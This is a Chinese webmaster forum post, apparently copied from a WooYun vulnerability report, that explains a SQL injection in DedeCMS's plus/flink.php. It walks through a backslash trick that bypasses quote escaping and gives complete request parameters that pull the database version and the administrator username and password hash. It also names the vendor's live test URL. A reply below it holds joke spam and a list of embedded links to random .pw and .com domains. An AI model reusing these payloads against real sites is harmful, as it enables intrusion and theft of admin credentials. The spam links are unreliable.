2. 交流综合区
  3. DedeCMS全版本通杀SQL注入(真正的无任何限制附官方测试结果)

2核1G3M服务器88一季度

腾讯云,阿里云百度云等 折扣价→点我←

DedeCMS全版本通杀SQL注入(真正的无任何限制附官方测试结果)

公共账号 管理员组
详细说明:[p=25, null, left]首先,我们来看看dede重要文件 common.inc.php

这里开始过滤得很完整,往下看

//转换上传的文件相关的变量及安全处理、并引用前台通用的上传函数

[/p]if($_FILES)
{
require_once(DEDEINC.'/uploadsafe.inc.php');
}[p=25, null, left]



我看再看:uploadsafe.inc.php

[/p]//29行
$$_key = $_FILES[$_key]['tmp_name'] = str_replace("\\\\", "\\", $_FILES[$_key]['tmp_name']);[p=25, null, left]

看到这里,我笑了。

这不是能绕过 GPC的节奏么。



好吧,随便找一个能添加数据的地方

于是找到了

plus\flink.php



虽然都经过 htmlspecialchars

我们看看:

htmlspecialchars(string,quotestyle,character-set)





可选。规定如何编码单引号和双引号。

ENT_COMPAT - 默认。仅编码双引号。

ENT_QUOTES - 编码双引号和单引号。

ENT_NOQUOTES - 不编码任何引号。

默认情况下仅编码双引号。



这里不是重点,不过也是能利用的条件之一,用于绕过dede自带的ids。

构造webname 值为:

[/p]&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname]=10&&_FILES[webname][tmp_name]=pass\[p=25, null, left]



这里解释一下,经过GPC后 webname 变为 pass\\

经过刚才 uploadsafe.inc.php 的函数后

webname 变为 pass\



插入到SQL语句中就变成了

[/p]INSERT INTO `#@__flink`(sortrank,url,webname,logo,msg,email,typeid,dtime,ischeck) VALUES('50','http://','pass\','[p=25, null, left]



即吃掉了后面的 ' ,从而实现绕过GPC。

不过ExecuteNoneQuery不支持错误回显,那我们就构造好,让他显示出来吧。于是后面的logo函数就变成:

logo=,if(@`'`,0x7c,(select version())),1,1,1,1,1)#,@`'`



ischeck 为1即绕过审核,结果直接显示出来。



完整参数为:

查版本:

[/p]Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select version())),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname]=10&&_FILES[webname][tmp_name]=pass\[p=25, null, left]



查密码:

[/p]Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname]=10&&_FILES[webname][tmp_name]=pass\[p=25, null, left]



验证码字段自己修改。。。[/p]漏洞证明:
[p=25, null, left]http://www.wooyun.org/upload/201402/251032195f50c560870c6d11b3870b1d97013fcc.jpg[/p]
[p=25, null, left]http://www.wooyun.org/upload/201402/2510323488ffcb2474cfeb61e092b786d878a537.jpg[/p][p=25, null, left]



官方测试地址:

http://help.dedecms.com/plus/flink.php

[/p][p=25, null, left]http://www.wooyun.org/upload/201402/25104200f25f357101c7489af3eb80eaf8ecc696.jpg[/p]
站长窝论坛版权声明 1、本帖标题:DedeCMS全版本通杀SQL注入(真正的无任何限制附官方测试结果)
2、论坛网址:站长窝论坛
3、站长窝论坛的资源部分来源于网络,如有侵权,请联系站长进行删除处理。
4、会员发帖仅代表会员个人观点,并不代表本站赞同其观点和对其真实性负责。
5、站长窝论坛一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本帖由公共账号在站长窝论坛《交流综合区》版块原创发布, 转载请注明出处!
收藏的用户(0 X
正在加载信息~
上一篇:DedeCMS Dialog目录下配置文件XSS漏洞
下一篇:Dedecms flash反射性XSS跨站
评论
最新回复 (1)
  • 丰斌啉 一级用户组
    引用 2
    火车临时停靠,从火车窗口买个烧鸡。钱递过去了,老板把烧鸡递给我时死活不撒手。火车走了,只留下一个鸡头在我手里。妈的,奸商
    有次和一位女同学微信聊天,本来要打的一句话是“我觉得你声音很好听!”结果手抖打成“我觉得你的呻吟很好听”!5分钟后,女同学男友的电话就打过来了!我是接还是不接?
    毕业后,我到一所女子学校任教,由于年轻的男老师极少,所以我总以为自己这个纯爷们儿将非常受欢迎。第一堂课,有一位女学生忘记带课本,我请她站起来,问其他同学该怎么处罚。她们很有默契的齐声说:“老师亲她一个!”大家等着看我的反应。我瞄了那位同学一眼,只好回答:“不可以处罚老师!”
    [media=x,500,375]bjlqydqs16.com[/media]
    [media=x,500,375]bylhmzto.pw[/media]
    [media=x,500,375]bjlxeuef51.com[/media]
    [media=x,500,375]bjlhgyfm15.com[/media]
    [media=x,500,375]bylfckvj.pw[/media]
    [media=x,500,375]byldxfgq.pw[/media]
    大学同学聚会,大家都很装逼,有人在打电话谈生意,还有人在用笔记本交易股票,为了让我自己也显得工作很忙,我不停的给他们端茶倒水上菜。
    [media=x,500,375]byllatbx.pw[/media]
    [media=x,500,375]bjlcunjc73.com[/media]
    [media=x,500,375]bylfvvus.pw[/media]
    [media=x,500,375]bylpgnqt.pw[/media]
    [media=x,500,375]bylprluh.pw[/media]
    女友爱面子,中午她表哥来了,我陪着说会儿话。表哥看起来很朴实,我随口问他:“你做什么工作?”一旁的女友抢着说:“种花的。”我又问:“种什么花呀?”只听表哥很直率地回答:“种棉花的。”
    2015/01/12 17:22:19 只看Ta 回复
返回
发新帖
作者最近主题
相关贴子